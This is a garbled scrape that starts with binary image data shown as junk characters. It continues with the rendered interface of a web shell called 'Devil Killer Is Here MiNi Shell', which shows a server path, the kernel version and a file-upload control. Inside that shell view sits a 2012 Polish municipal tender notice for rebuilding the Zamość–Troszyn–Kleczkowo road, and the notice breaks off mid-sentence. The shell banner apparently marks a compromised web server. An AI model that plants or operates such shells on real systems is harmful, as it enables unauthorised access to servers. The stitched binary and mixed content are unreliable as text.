JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120309/74146-N-2012.html

<p class="kh_header"><b>Troszyn: Poprawa bezpieczeństwa komunikacyjnego regionu poprzez przebudowę ciągu drogowego Zamość- Troszyn - Kleczkowo</b><br>
<b>Numer ogłoszenia: 74146 - 2012; data zamieszczenia: 09.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Troszyn , ul. Słowackiego 13, 07-405 Troszyn, woj. mazowieckie, tel. 29 7673168, faks 29 7671053.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.troszyn.asi.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa bezpieczeństwa komunikacyjnego regionu poprzez przebudowę ciągu drogowego Zamość- Troszyn - Kleczkowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie  zadania inwestycyjnego  pn.: Poprawa bezpieczeństwa komunikacyjnego regionu poprzez przebudowę ciągu drogowego Zamość - Troszyn - Kleczkowo
Przedmiot zamówienia obejmuje: 
Wykonanie robót przebudowy ciągu drogowego: Zamość - Troszyn - Kleczkowo ( wraz z robotami w ulicach Diamentowej, Szkolnej, Polnej i M. Konopnickiej ) na terenie gminy Troszyn i zostało podzielone w kosztorysie ofertowym na przebudowę dróg gminnych i dróg powiatowych zlokalizowanych na całym zakresie objętym przedmiotem zamówienia. 
Przebudowa odcinków dróg gminnych w ciągu ulicy M. Konopnickiej, Polnej i Diamentowej obejmuje w szczególności wykonanie następujących robót:
-prace pomiarowe wraz z inwentaryzacją geodezyjną po wykonawczą na długości łącznej 1,006 km,
-rozbiórki istniejących krawężników betonowych na długości 80 mb,
-rozbiórki nawierzchni chodnika z kostki betonowej na powierzchni 160 m2,
-studzienek ściekowych odwodnienia o średnicy 500 mm, w ilości 18 szt.,
-studni rewizyjno - połączeniowych na kanalizacji deszczowej o średnicy 1200 mm, w ilości 13 szt.,
-robót ziemnych - wykopów liniowych pod kanalizację deszczową w ilości 1163,05 m3, wykopów pod konstrukcję nawierzchni jezdni i poszerzeń w ilości 1351,62 m3,
-robót ziemnych polegających na zasypaniu przekopów po kanalizacji deszczowej w ilości 974,54 m3,
-wykonanie zasypki piaskiem 0/2 kanalizacji deszczowej w ilości 337,28 m3,
-wykonanie kanalizacji deszczowej z rur PVC 200 mm w ilości 75,5 mb,
-wykonanie kanalizacji deszczowej z rur PVC 250 mm w ilości 207 mb,
-wykonanie kanalizacji deszczowej z rur PVC 315 mm w ilości 206 mb,
-zamontowanie separatorów lamelowych na kanalizacji deszczowej 2 szt.,
-wykonanie krat o średnicy 315 mm na kanale deszczowym 2 szt.,
-wykonanie zasuw burzowych na kanale deszczowym 315 mm 2 szt.,
-montaż tulei ochronnych w ilości 48 szt.,
-ustawienie krawężnika betonowego 15 x 30 cm 80 mb,
-ustawienie obrzeży betonowych 8 x 30 cm 80 mb,
-wykonanie nawierzchni wjazdów bramowych z kostki wraz z podbudową z kruszywa łamanego w ilości 88 m2,
-wykonanie nawierzchni chodników z kostki betonowej z podsypką i podbudową z kruszywa naturalnego w ilości 72 m2,
-wykonanie profilowania i zagęszczania podłoża pod warstwy konstrukcyjne na jezdni i poszerzeniach w ilości 3085,5 m2,
-wykonanie podbudowy z mieszanki kruszywa łamanego o grubości 20 cm na jezdni głównej i poszerzeniach w ilości 3085,5 m2,
-wykonanie warstwy odsączającej z kruszywa naturalnego o grubości 15 cm w ilości 2910 m2,
-wykonanie warstwy wiążącej z betonu asfaltowego o grubości 4 cm jako przykrycie podbudowy na poszerzeniach w ilości 162 m2,
-wykonanie warstwy wiążąco - profilującej z betonu asfaltowego o średniej grubości 4 cm w ilości 2910 m2,
-wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm w ilości 6945,
-wykonanie uzupełnienia oraz ścinania i zagęszczania poboczy z zastosowanie mieszanki kruszywa naturalnego fr. 0/31,50 mm w ilości 500 m2,
-ustawienie oznakowania pionowego obejmującego słupek stalowy i tablice znaku w ilości 9 szt.,
-wykonanie oznakowania poziomego farbą chlorokauczukową w ilości 19 m2,
Przebudowa odcinków dróg powiatowych w ciągu drogowym Zamość - Troszyn - Kleczkowo i w ulicy Szkolnej w Troszynie obejmuje w szczególności wykonanie następujących robót:
-prace pomiarowe wraz z inwentaryzacją geodezyjną po wykonawczą na długości łącznej 7,955 km,
-usunięcia krzaków i zarośli wraz z wycinką drzew na powierzchni 0,85 ha,
-rozbiórki istniejących krawężników betonowych na długości 215 mb,
-rozbiórki nawierzchni z betonu asfaltowego wraz z podbudową  na powierzchni 215 m2,
-studzienek ściekowych odwodnienia o średnicy 500 mm, w ilości 60 szt.,
-studni rewizyjno - połączeniowych na kanalizacji deszczowej o średnicy 1000 mm, w ilości 16 szt.,
-robót ziemnych - wykopów pod projektowaną ścieżkę pieszo - rowerową w ilości 740,4 m3
-robót ziemnych - wykopów koryta pod konstrukcję zatok przystankowych na powierzchni 494 m2, głębokość 36 cm,
-roboty ziemne - wykonanie wykopów koryta na poszerzeniach jezdni w ilości 379,2 m3,
-wykonanie przykanalików PVC o średnicy 160 mm w ilości 178 mb,
-wykonanie kanalizacji deszczowej z rur PVC 200 mm w ilości 82 mb,
-wykonanie kanalizacji deszczowej z rur PVC 250 mm w ilości 79 mb,
-wykonanie kanalizacji deszczowej z rur PVC 315 mm w ilości 57 mb,
-wykonanie kanałów deszczowych z rur PP o średnicy 500 mm w ilości 150 mb,
-wykonanie rurociągów drenarski z rur PVC 200 mm w otulinie z geowłókniny i obsypaniem żwirem w ilości 1115 mb,
-wykonanie ścieków pod chodnikowych w ilości 36 mb,
-wykonanie przebudowy przepustów z rur PEHD o średnicy 80 cm - 2 szt.,
-wykonanie przebudowy przepustów z rur PEHD o średnicy 60 cm - 4 szt.,
-wykonanie ścianki czołowej betonowej na istniejącym przepuści o średnicy 80 cm - 1 szt.,
-wykonanie przepustów pod zjazdami z rur PE/PP o średnicy 40 cm w ilości 182 mb,
-ustawienie krawężnika betonowego 15 x 30 cm 3710 mb,
-ustawienie obrzeży betonowych 8 x 30 cm 7184 mb,
-wykonanie nawierzchni wjazdów bramowych z kostki wraz z podbudową z kruszywa łamanego w ilości 710 m2,
-wykonanie nawierzchni chodników z kostki betonowej z podsypką i podbudową z kruszywa naturalnego w ilości 4666 m2,
-wykonanie nawierzchni pierścienia najazdowego na rondzie z kostki betonowej 8 cm na podbudowie z mieszanki z kruszywa łamanego w ilości 65 m2,
-wykonanie profilowania i zagęszczania podłoża pod warstwy konstrukcyjne na jezdni i poszerzeniach w ilości 7007 m2,
-wykonanie podbudowy z mieszanki kruszywa łamanego o grubości 20 cm na jezdni głównej i poszerzeniach w ilości 2855 m2,
-wykonanie nawierzchni z mieszanki kruszywa łamanego o grubości 10 cm w ilości 684 m2,
-wykonanie warstwy podbudowy z kruszywa naturalnego zagęszczanego mechanicznie fr. 0/31,50 mm  o grubości 15 cm w ilości 3504 m2,
-wykonanie warstwy wiążącej z betonu asfaltowego o grubości 4 cm jako przykrycie podbudowy na poszerzeniach w ilości 1387,5 m2,
-wykonanie warstwy wiążąco - profilującej z betonu asfaltowego o średniej grubości 5 cm w ilości 19335 m2,
-wykonanie warstwy wiążąco - profilującej z betonu asfaltowego o średniej grubości 4 cm na istniejącej nawierzchni bitumicznej w ilości 3060 m2,
-wykonanie warstwy ścieralnej z betonu asfaltowego o grubości 4 cm na istniejących nawierzchniach bitumicznych w ilości 3015 m2,
-wykonanie  warstwy ścieralnej z betonu asfaltowego na zjazdach o grubości 4 cm w ilości 583 m2,
-wykonanie warstwy wiążącej z betonu asfaltowego o grubości 5 cm na zjazdach w ilości 583 m2,
-wykonanie  warstwy ścieralnej z betonu asfaltowego o grubości 4 cm na zatokach przystankowych w ilości 494 m2,
-wykonanie warstwy wiążącej z betonu asfaltowego o grubości 5 cm na zatokach przystankowych w ilości 494 m2,
-wykonanie  warstwy ścieralnej z betonu asfaltowego o grubości 4 cm na ciągu pieszo - rowerowych i przejazdach bramowych przez ścieżkę w ilości 3702 m2,
-wykonanie uzupełnienia oraz ścinania i zagęszczania poboczy z zastosowanie mieszanki kruszywa naturalnego fr. 0/31,50 mm w ilości 6940 m2,
-ustawienie oznakowania pionowego obejmującego słupek stalowy i tablice znaku w ilości 100 szt.,
-przygotowanie i zamocowanie tabliczek pod znaki drogowe w ilości 14 szt.,
wykonanie oznakowania poziomego farbą chlorokauczukową w ilości 251 m2,
-ustawienie wygrodzeń z barierek typu olsztyńskiego w ilości 48 mb,
-wykonanie odtworzenia istniejących rowów drogowych lub wykonanie nowych w ilości 6236 mb.

Szczegółowy zakres robót do wykonania ujęty jest w .:
1)	Dokumentacji projektowej   - Projekt wykonawczy ( odrębnie dla ulicy Diamentowej odrębnie dla ciągu dróg powiatowych z ul. Szkolną, ul. Polną, ul. M. Konopnickiej (Załącznik Nr8  do  SIWZ)                                    
2)	Specyfikacjach  Technicznych Wykonania i Odbioru Robót  (Załącznik Nr 9 do SIWZ)    
3)	Przedmiary robót   (Załącznik Nr 10  do SIWZ)  są materiałem pomocniczym, który służyć ma opisowi sposobu i technologii wykonania robót.     
3.3. Wszystkie nazwy własne materiałów i urządzeń użyte w dokumentacji przetargowej są podane
przykładowo i określają jedynie minimalne oczekiwane parametry jakościowe oraz wymagany
standard.
3.4. Każda zmiana technologii wykonania robót z inicjatywy Wykonawcy wymaga akceptacji
Projektanta, który wykonał dokumentację oraz Zamawiającego z udziałem Inspektora Nadzoru. Koszt wprowadzenia zmian obciąża Wykonawcę.
               
3.5. Dodatkowe warunki dotyczące przedmiotu zamówienia :
Zamawiający wymaga udzielenia gwarancji jakości na wykonane zamówienie na okres minimum  36 miesięcy licząc od dnia protokolarnego końcowego odbioru robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 30 000,00  zł (słownie: trzydzieści  tysięcy  złotych).
2.	Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy Pzp, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275 ze zm.).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.	Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:
Bank Spółdzielczy w Goworowie Oddział w Troszynie    Nr 90 8915 1013 0010 0003 2000 0010
5.	W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego Urząd Gminy w Troszynie, ul. Słowackiego 13, 07-405 Troszyn w sekretariacie  , a kserokopię dokumentu poświadczoną za zgodność z oryginałem należy załączyć do oferty.
7.	Niewniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że wykonał w okresie ostatnich pięciu lat przed upływem
terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym
okresie, co najmniej jedna robotę drogową  polegającą na budowie, przebudowie, rozbudowie drogi lub ulicy o nawierzchni bitumicznej o wartości co najmniej 3 000 000,00 brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga dysponowania co najmniej jedną osobą pełniącą funkcję kierownika
budowy, która posiada uprawnienia budowlane w specjalności drogowej i co najmniej jedną
osobą pełniącą funkcję kierownika robót w specjalności sanitarnej , zgodnie z ustawą z dnia 7
lipca 1994 r. Prawo Budowlane oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia
28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie, wraz z
opłaconymi składkami ubezpieczenia we właściwej Izbie Samorządu Zawodowego, ze wskazaniem
tych osób.
Zamawiający określając wymogi dla osób w zakresie posiadanych  uprawnień budowlanych i elektrycznych dopuszcza odpowiadające im uprawnienia budowlane i elektryczne, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im kwalifikacje zawodowe uprawniające do kierowania robotami budowlanymi w danej specjalności nabyte w państwach członkowskich Unii Europejskiej , Konfederacji Szwajcarskiej oraz państwach Europejskiego Obszaru Gospodarczego, stosownie do przepisu art. 12 a Prawo budowlane oraz przepisów ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej ( Dz. U. z 2008 r., Nr 63 poz. 349).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz Oferty, sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do SIWZ,
2.oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust1 u.p.z.p., sporządzone na podstawie wzoru stanowiącego załącznik nr 2 do SIWZ,
3.kosztorysy ofertowe - sporządzone  na formularzach  zawartych w załączniku nr 11
4.dokument potwierdzający wniesienie wadium,
5.stosowne Pełnomocnictwo(a) - zgodnie z punktem 14.1.3. SIWZ,
6.w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego, zgodnie z 10.1 SIWZ,
Ocena spełniania powyżej przedstawionych warunków zostanie dokonana wg formuły: spełnia - nie spełnia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia  zmian postanowień zawartej umowy w
stosunku do treści oferty na podstawie, której dokonano wyboru wykonawcy i określa
następujące warunki takich zmian :
1) termin realizacji przedmiotu umowy w przypadku:
a) wystąpienia okoliczności niezależnych od Wykonawcy, których nie mógł przewidzieć
przy zachowaniu należytej staranności, skutkujących niemożnością dotrzymania terminu
realizacji przedmiotu zamówienia, a w szczególności:
- konieczności wykonania robót niezbędnych, zamiennych, dodatkowych, których
wykonanie wpływa na zmianę terminu wykonania zamówienia podstawowego,
- okoliczności zaistniałych w trakcie realizacji przedmiotu umowy tj. warunki
atmosferyczne, kolizje utrudniające lub uniemożliwiające terminowe wykonanie
przedmiotu umowy.
b) wstrzymania przez Zamawiającego wykonania robót nie wynikających z okoliczności
leżących po stronie Wykonawcy. Nie dotyczy okoliczności wstrzymania robót przez
inspektorów nadzoru Zamawiającego w przypadku stwierdzenia nieprawidłowości
zawinionych przez Wykonawcę,
c) konieczności wykonania przez Zamawiającego korekty projektu dla usunięcia wad
dostarczonej dokumentacji.
W przypadku zmiany terminu realizacji przedmiotu umowy, wymienionych w literach a-c, termin
ten może ulec przedłużeniu nie dłużej jednak, niż o czas trwania tych okoliczności.
2) wysokość ceny ryczałtowej brutto w przypadku zmiany stawki podatku VAT dla robót
objętych przedmiotem zamówienia
W trakcie realizacji przedmiotu umowy, strony dokonają odpowiedniej zmiany wynagrodzenia
umownego- dotyczy to części wynagrodzenia za roboty, których w dniu zmiany stawki podatku
